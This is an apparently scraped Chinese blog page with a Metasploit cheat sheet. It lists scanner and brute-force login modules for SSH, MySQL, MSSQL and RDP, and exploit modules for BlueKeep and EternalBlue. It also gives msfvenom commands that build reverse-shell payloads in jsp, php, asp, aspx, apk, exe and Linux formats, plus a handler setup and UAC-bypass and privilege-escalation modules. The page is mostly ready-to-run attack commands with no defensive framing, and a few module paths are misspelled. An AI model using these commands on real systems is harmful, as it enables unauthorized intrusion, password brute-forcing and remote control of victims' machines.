zoukankan      html  css  js  c++  java
  • MSF

     端口-服务模块

    arp扫描
    auxiliary/scanner/discovery/arp_sweep
    smb服务扫描
    auxiliary/scancer/smb/smb_version
    端口扫描
    auxiliary/scanner/portscan/syn
    telent服务扫描
    auxiliary/scanner/telnet/telnet_version
    rdp服务扫描
    auxiliary/scanner/rdp/rdp_scanner
    ssh主机扫描
    auxiliary/scanner/ssh/ssh_version Use

    SSH爆破
    uxiliary/scanner/ssh/ssh_login
    Mysql爆破
    auxiliary/scanner/mysql/mysql_login
    Mysql服务扫描
    auxiliary/scanner/mysql/mysql_version
    MSSQL爆破
    auxiliary/scanner/mssql/mssql_login
    PostgreSQL
    auxiliary/scanner/postgres/postgres_version  
    auxiliary/scanner/postgres/postgres_login                                       

    漏洞模块

    CVE-2019-0708

    扫描模块

    auxiliary/scanner/rdp/cve_2019_0708_bluekeep

    攻击模块

    exploit/windows/rdp/cve_2019_0708_bluekeep_rce    

    ms17-010

    扫描模块
    auxiliary/scanner/smb/smb_ms17_010
    攻击模块
    exploit/windows/smb/ms17_010_eternalblue

    CVE-2012-2122

    auxiliary/admin/mysql/mysql_enum

        

    Shell生成模块

    jsp
    msfvenom -p java/jsp_shell_reverse_tcp LHOST=[ip] LPORT=[Port] R >text.jsp
    
    php
    msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 -f raw >text.php
    
    asp
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 -f asp > shell.asp
    
    aspx
    msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST= 192.168.1.109 LPORT=7788 -f aspx x> /home/niexinming/back.aspx
    
    apk
    msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 R >text.apk
    
    exe
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=44444 X >test.exe
    
    Linux
    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 X >text

    Shell反弹模块

    exploit/multi/handler
    set payload php/meterpreter/reverse_tcp  |  set PAYLOAD java/jsp_shell_reverse_tcp 

    提权模块

    Mysql数据库提权
    UDF提权    
    Metasploit提供的exploit适应于5.5.9以下
    Mof提权 exploit/windows/mysql/mysql_mof

    UAC提权
    exploit
    /windows/local/bypassuac exploit/windows/local/bypassuac_fodhelper exploit/windows/local/bypassuac_comhijack exploit/windows/local/bypassuac_eventvwr 通过incognito中的add_localgroup_user提权 域提权 - ms13-081、ms15-051、ms16-032、MS16-016、MS14-068、ms18_8120_win32k_privesc

    问题

    (1)[-] Handler failed to bind to 192.168.1.211:4444:- -重启msf
  • 相关阅读:
    20170705总结
    20170703总结
    .NET 框架程序使用 Win32 API
    青春 就此别过
    Aptana Studio 2启动时提示 Workspace Cannot Be Created 解决办法
    App_GlobalResources.afvubzdv.resources.dll”--“拒绝访问。“
    c# 一维数组和二维数组的定义几种方式<转>.
    C#中Split分隔字符串的应用(C#、split、分隔、字符串)<转>
    C#操作字符串方法总结<转>
    C# 时间格式大全
  • 原文地址:https://www.cnblogs.com/AtesetEnginner/p/11164755.html
Copyright © 2011-2022 走看看